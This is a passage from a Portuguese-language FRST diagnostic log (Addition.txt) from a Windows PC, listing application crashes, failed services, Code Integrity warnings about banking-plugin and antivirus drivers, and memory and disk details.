Identificação do processo com falha: 0x45c
Hora de início do aplicativo com falha: 0x01d3fd38d16653d3
Caminho do aplicativo com falha: C:\Windows\Explorer.EXE
FCaminho do módulo de falhas: mso.dll
Identificação do Relatório: adb673d6-692c-11e8-8381-af52363bd2c4

Error: (06/05/2018 10:40:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SWMAgent.exe, versão: 2.2.1.16, carimbo de hora: 0x559bc5e1
Nome do módulo de falhas: unknown, versão: 0.0.0.0, carimbo de hora: 0x00000000
Código de exceção: 0xc0000005
Deslocamento com falha: 0x00000000
Identificação do processo com falha: 0xc84
Hora de início do aplicativo com falha: 0x01d3fd34b62a70bb
Caminho do aplicativo com falha: C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe
FCaminho do módulo de falhas: unknown
Identificação do Relatório: 99688666-692a-11e8-9f22-50b7c3c6601c


Erros de Sistema:
=============
Error: (06/06/2018 07:48:39 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço dahkService foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
wsddfac

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço saiyi technology limit foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço ResTCPSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).

Error: (06/06/2018 07:47:44 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Serviço Prefs Secure suspenso ao iniciar.

Error: (06/06/2018 07:47:43 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Serviço Background Logic Handler suspenso ao iniciar.

Error: (06/06/2018 07:43:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço DgiVecp devido ao seguinte erro:
O sistema não pode encontrar o arquivo especificado.

Error: (06/05/2018 10:57:13 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: O serviço Serviço da Lista de Redes depende do serviço Reconhecimento de Locais de Rede, mas não foi possível iniciá-lo devido ao seguinte erro:
Não foi possível iniciar o serviço ou grupo de dependência.


CodeIntegrity:
===================================

Date: 2018-05-25 19:47:47.963
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Diebold\Warsaw\wslbscrwh64.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-05-25 19:47:47.948
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Diebold\Warsaw\wslbscr64.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.812
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\PROGRA~2\GbPlugin\wsftprp64.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.781
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\GbPlugin\gbprcm64.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:12:02.672
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:31.688
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsddpp.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:27.164
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system.

Date: 2016-07-18 09:11:26.368
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system.

==================== Informações da Memória ===========================

Processador: Intel(R) Core(TM) i3-3120M CPU @ 2.50GHz
Percentagem de memória em uso: 76%
RAM física total: 3797.3 MB
RAM física disponível: 889.89 MB
Virtual Total: 7592.8 MB
Virtual disponível: 4235.98 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:357.28 GB) NTFS

\\?\Volume{fad0dff0-a57d-11e5-aaf2-806e6f6e6963}\ (Reservado pelo Sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 88E80C01)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================